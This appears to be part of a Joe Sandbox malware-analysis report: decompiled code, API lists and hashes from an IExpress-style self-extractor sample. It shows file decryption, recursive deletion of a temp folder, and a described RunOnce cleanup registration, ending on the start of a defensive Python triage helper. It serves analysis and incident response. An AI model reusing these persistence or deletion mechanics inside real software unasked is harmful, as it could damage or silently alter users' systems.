                                                                                                                                                                                                    0x00131c67
                                                                                                                                                                                                    0x00131c67
                                                                                                                                                                                                    0x00131c6d
                                                                                                                                                                                                    0x00131c72
                                                                                                                                                                                                    0x00131c74
                                                                                                                                                                                                    0x00131c74
                                                                                                                                                                                                    0x00131c8e
                                                                                                                                                                                                    0x00131c99
                                                                                                                                                                                                    0x00131cc0
                                                                                                                                                                                                    0x00131cf8
                                                                                                                                                                                                    0x00131d07
                                                                                                                                                                                                    0x00131d23
                                                                                                                                                                                                    0x00131d09
                                                                                                                                                                                                    0x00131d14
                                                                                                                                                                                                    0x00131d1b
                                                                                                                                                                                                    0x00131d1b
                                                                                                                                                                                                    0x00131d2b
                                                                                                                                                                                                    0x00131d2d
                                                                                                                                                                                                    0x00131d2d
                                                                                                                                                                                                    0x00131d38
                                                                                                                                                                                                    0x00131d39
                                                                                                                                                                                                    0x00131d46
                                                                                                                                                                                                    0x00131cc2
                                                                                                                                                                                                    0x00131cc2
                                                                                                                                                                                                    0x00131ccc
                                                                                                                                                                                                    0x00131cce
                                                                                                                                                                                                    0x00131cce
                                                                                                                                                                                                    0x00131cdb
                                                                                                                                                                                                    0x00131ce6
                                                                                                                                                                                                    0x00131cee
                                                                                                                                                                                                    0x00131cee
                                                                                                                                                                                                    0x00131e89
                                                                                                                                                                                                    0x00131e91
                                                                                                                                                                                                    0x00131e92
                                                                                                                                                                                                    0x00131e94
                                                                                                                                                                                                    0x00131e97
                                                                                                                                                                                                    0x00131ea4
                                                                                                                                                                                                    0x00131ea4
                                                                                                                                                                                                    0x00131c61
                                                                                                                                                                                                    0x00131c07
                                                                                                                                                                                                    0x00131bd3
                                                                                                                                                                                                    0x00131b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00131C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00131140,00000000,00000008,?), ref: 00131CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00131D1B
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-2112662285
                                                                                                                                                                                                    • Opcode ID: 342973ac97a7969ddae4281607ad45343571433b8bcd69707c7fc434397bf41d
                                                                                                                                                                                                    • Instruction ID: 09674bf573bb2df919d7dde66037bd2d173e430ab1c6fe771462060c434e249e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 342973ac97a7969ddae4281607ad45343571433b8bcd69707c7fc434397bf41d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCA138B0A002187BEB249B24CC45FEA7B79EF55310F1442A5F995A32D1DBB09EC6CB50
                                                                                                                                                                                                     Uniqueness
                                                                                                                                                                                                     • Uniqueness Score: -1.00%
                                                                                                                                                                                                     Control-flow Graph
                                                                                                                                                                                                    control_flow_graph 450 132f1d-132f3d 451 132f3f-132f46 450->451 452 132f6c-132f73 call 135164 450->452 454 132f48 call 1351e5 451->454 455 132f5f-132f66 call 133a3f 451->455 459 133041 452->459 460 132f79-132f80 call 1355a0 452->460 461 132f4d-132f4f 454->461 455->452 455->459 464 133043-133053 call 136ce0 459->464 460->459 468 132f86-132fbe GetSystemDirectoryA call 13658a LoadLibraryA 460->468 461->459 465 132f55-132f5d 461->465 465->452 465->455 472 132fc0-132fd4 GetProcAddress 468->472 473 132ff7-133004 FreeLibrary 468->473 472->473 474 132fd6-132fee DecryptFileA 472->474 475 133017-133024 SetCurrentDirectoryA 473->475 476 133006-13300c 473->476 474->473 489 132ff0-132ff5 474->489 477 133026-13303c call 1344b9 call 136285 475->477 478 133054-13305a 475->478 476->475 479 13300e call 13621e 476->479 477->459 483 133065-13306c 478->483 484 13305c call 133b26 478->484 485 133013-133015 479->485 486 13306e-133075 call 13256d 483->486 487 13307c-133089 483->487 495 133061-133063 484->495 485->459 485->475 496 13307a 486->496 492 1330a1-1330a9 487->492 493 13308b-133091 487->493 489->473 499 1330b4-1330b7 492->499 500 1330ab-1330ad 492->500 493->492 497 133093 call 133ba2 493->497 495->459 495->483 496->487 503 133098-13309a 497->503 499->464 500->499 502 1330af call 134169 500->502 502->499 503->459 505 13309c 503->505 505->492
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00132F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0x138a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00135164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00136CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E001355A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E0013658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x13a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x138a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x138a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x138d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0x138d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0x139a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E0013256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0x138a24; // 0x0
                                                                                                                                                                                                    									 *0x139a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0x138a38;
                                                                                                                                                                                                    										if( *0x138a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00134169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0x139a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00133BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0x138a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00133B26(_t40, _t44);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L16;
					}
					goto L20;
				}
				_t43 = 0x4bc;
				E001344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
				 *0x139124 = E00136285();
				goto L16;
			}
			_t59 =  *0x139a30 - _t44; // 0x0
			if(_t59 != 0) {
				goto L14;
			}
			_t30 = E0013621E(); // executed
			if(_t30 == 0) {
				goto L16;
			}
			goto L14;
		}
	}
	_t49 =  *0x138a24;
	if( *0x138a24 != 0) {
		L4:
		_t34 = E00133A3F(_t51);
		_t52 = _t34;
		if(_t34 == 0) {
			goto L16;
		}
		goto L5;
	}
	if(E001351E5(_t49) == 0) {
		goto L16;
	}
	_t51 =  *0x138a38;
	if( *0x138a38 != 0) {
		goto L5;
	}
	goto L4;
}

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00132F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00132FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00132FC6
• DecryptFileA.ADVAPI32 ref: 00132FE6
• FreeLibrary.KERNEL32(00000000), ref: 00132FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013301C
  • Part of subcall function 001351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F4D,?,00000002,00000000), ref: 00135201
Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-1002207402
                                                                                                                                                                                                    • Opcode ID: cb7d6c583aa241ca66bd5c419af457ab858fab114a859b3216925f6dffd33baf
                                                                                                                                                                                                    • Instruction ID: feffddb03ad88e97e8572a6b3d2ecfe4d651ceec24f39ba7ec55fe3900fda771
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7d6c583aa241ca66bd5c419af457ab858fab114a859b3216925f6dffd33baf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41D331A003059BDB38BB71EC49A6A77A8DF64750F100165F991D3991EFB4CFC0CA65
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00132390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00136CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00131680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E001316B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00131680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E001316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E001316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E0013658A( &_v280, 0x104, 0x131140);
                                                                                                                                                                                                    								E00132390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00132398
                                                                                                                                                                                                    0x0013239e
                                                                                                                                                                                                    0x001323a3
                                                                                                                                                                                                    0x001323a5
                                                                                                                                                                                                    0x001323ae
                                                                                                                                                                                                    0x001323b3
                                                                                                                                                                                                    0x001324cb
                                                                                                                                                                                                    0x001324d2
                                                                                                                                                                                                    0x001324d3
                                                                                                                                                                                                    0x001324d4
                                                                                                                                                                                                    0x001324df
                                                                                                                                                                                                    0x001323c2
                                                                                                                                                                                                    0x001323d1
                                                                                                                                                                                                    0x001323db
                                                                                                                                                                                                    0x001323e4
                                                                                                                                                                                                    0x001323f6
                                                                                                                                                                                                    0x001323fc
                                                                                                                                                                                                    0x00132401
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132407
                                                                                                                                                                                                    0x00132407
                                                                                                                                                                                                    0x00132408
                                                                                                                                                                                                    0x00132411
                                                                                                                                                                                                    0x0013241f
                                                                                                                                                                                                    0x0013247a
                                                                                                                                                                                                    0x00132483
                                                                                                                                                                                                    0x00132495
                                                                                                                                                                                                    0x001324a3
                                                                                                                                                                                                    0x00132421
                                                                                                                                                                                                    0x0013242f
                                                                                                                                                                                                    0x00132453
                                                                                                                                                                                                    0x0013245d
                                                                                                                                                                                                    0x00132466
                                                                                                                                                                                                    0x00132472
                                                                                                                                                                                                    0x00132472
                                                                                                                                                                                                    0x0013242f
                                                                                                                                                                                                    0x001324af
                                                                                                                                                                                                    0x001324b5
                                                                                                                                                                                                    0x001324be
                                                                                                                                                                                                    0x001324c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001324c5

APIs
• FindFirstFileA.KERNELBASE(?,00138A3A,001311F4,00138A3A,00000000,?,?), ref: 001323F6
• lstrcmpA.KERNEL32(?,001311F8), ref: 00132427
• lstrcmpA.KERNEL32(?,001311FC), ref: 0013243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00132495
• DeleteFileA.KERNEL32(?), ref: 001324A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 001324AF
• FindClose.KERNELBASE(00000000), ref: 001324BE
• RemoveDirectoryA.KERNELBASE(00138A3A), ref: 001324C5
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: 59518a50a88ecf73e88a593cf83f228c49f0f735183c14a2740e1e921eea1f62
• Instruction ID: de9c14248ad6e686fea2bd7aeb849bc8d7d3b814a8ec098709e917f433c2688f
• Opcode Fuzzy Hash: 59518a50a88ecf73e88a593cf83f228c49f0f735183c14a2740e1e921eea1f62
• Instruction Fuzzy Hash: 9731A272604740ABD320EBA4CC8AAEBB7ECAFD4305F44492DF59587290EB74D94DC792
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E00132BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	long _t4;
	void* _t6;
	intOrPtr _t7;
	void* _t9;
	struct HINSTANCE__* _t12;
	intOrPtr* _t17;
	signed char _t19;
	intOrPtr* _t21;
	void* _t22;
	void* _t24;
	intOrPtr _t32;

	_t4 = GetVersion();
	if(_t4 >= 0 && _t4 >= 6) {
		_t12 = GetModuleHandleW(L"Kernel32.dll");
		if(_t12 != 0) {
			_t21 = GetProcAddress(_t12, "HeapSetInformation");
			if(_t21 != 0) {
				_t17 = _t21;
				 *0x13a288(0, 1, 0, 0);
				 *_t21();
				_t29 = _t24 - _t24;
				if(_t24 != _t24) {
					_t17 = 4;
					asm("int 0x29");
				}
			}
		}
	}
	_t20 = _a12;
	_t18 = _a4;
	 *0x139124 = 0;
	if(E00132CAA(_a4, _a12, _t29, _t17) != 0) {
		_t9 = E00132F1D(_t18, _t20); // executed
		_t22 = _t9; // executed
		E001352B6(0, _t18, _t21, _t22); // executed
		if(_t22 != 0) {
			_t32 =  *0x138a3a; // 0x0
			if(_t32 == 0) {
				_t19 =  *0x139a2c; // 0x0
				if((_t19 & 0x00000001) != 0) {
					E00131F90(_t19, _t21, _t22);
				}
			}
		}
	}
	_t6 =  *0x138588; // 0x0
	if(_t6 != 0) {
		CloseHandle(_t6);
	}
	_t7 =  *0x139124; // 0x80070002
	return _t7;
}
Addresses: 0x00132c03, 0x00132c0d, 0x00132c18, 0x00132c20, 0x00132c2e, 0x00132c32, 0x00132c36, 0x00132c3d, 0x00132c43, 0x00132c45, 0x00132c47, 0x00132c49, 0x00132c4e, 0x00132c4e, 0x00132c47, 0x00132c32, 0x00132c20, 0x00132c50, 0x00132c54, 0x00132c57, 0x00132c64, 0x00132c66, 0x00132c6b, 0x00132c6d, 0x00132c74, 0x00132c76, 0x00132c7c, 0x00132c7e, 0x00132c87, 0x00132c89, 0x00132c89, 0x00132c87, 0x00132c7c, 0x00132c74, 0x00132c8e, 0x00132c95, 0x00132c98, 0x00132c98, 0x00132c9e, 0x00132ca7

APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00132C28
• CloseHandle.KERNEL32(00000000,?,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C98
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: e90687157d8e866ceb7bc0b3de6533ca488536606dcf06e7b9afcde162e597b2
• Instruction ID: 2b6f940bbc4893085194dfa2137ee4f49e206b91d478af102330fdbd15d7dc44
• Opcode Fuzzy Hash: e90687157d8e866ceb7bc0b3de6533ca488536606dcf06e7b9afcde162e597b2
• Instruction Fuzzy Hash: 6C11D671300305ABD7207BB5AC89A6F3B6D9F887A0F141015FD85E3691DFB1DC81C6A2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00136F40() {

                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00136EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00136f45
                                                                                                                                                                                                    0x00136f4d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00136F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: 06912507bc4a1566bba819f6a704d0ff4c37028e3ae888a5eacada8e6b706545
                                                                                                                                                                                                    • Instruction ID: 5777c60f317f6b2aac26877b9f2e912aa6dfea9abf6a20b612a9fc9fce4e5375
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06912507bc4a1566bba819f6a704d0ff4c37028e3ae888a5eacada8e6b706545
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA90026425110057D6105B709D1D41579915F4D603FC29470A051C8894DB6140885512
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

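The decompiled function E0013202A listed next is the RunOnce cleanup registration of an IExpress-style self-extractor (wextract): it opens HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce with KEY_READ|KEY_WRITE (0x2001f), probes value names wextract_cleanup0 through wextract_cleanup199 (0xc8) for the first one that does not exist, loads advpack.dll from the system directory, and writes a REG_SZ command built from one of two format strings, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"" or "%s /D:%s", whose arguments are the extractor's own module path and the extraction directory (here C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\). On the paths visible in this excerpt _t66 stays 0, so the "%s /D:%s" form is the one selected; the branch taken after a successful LoadLibraryA lies outside the listing. Because RegCreateKeyExA targets HKLM, the registration silently does nothing when the extractor runs without administrative rights (the early return at L24). The following triage helper is an added example, not part of the Joe Sandbox report or of the sample: it mirrors the slot-probing loop and parses both command formats so a responder can pull the extraction directory out of exported RunOnce values. The sample values are constructed, the IXP<digits>.TMP pattern is generalised from the single path on this page, and the regular expressions are this example's own.

```python
import re

# Constructed RunOnce values modelled on the two format strings in E0013202A
# (not taken from a real registry export).
SAMPLE_RUNONCE = {
    "wextract_cleanup0": 'rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 '
                         '"C:\\Users\\hardz\\AppData\\Local\\Temp\\IXP000.TMP\\"',
    "wextract_cleanup1": 'C:\\Users\\hardz\\AppData\\Local\\Temp\\IXP000.TMP\\file.exe '
                         '/D:C:\\Users\\hardz\\AppData\\Local\\Temp\\IXP001.TMP\\',
    "SomethingElse":     'C:\\Program Files\\Vendor\\updater.exe /silent',
}

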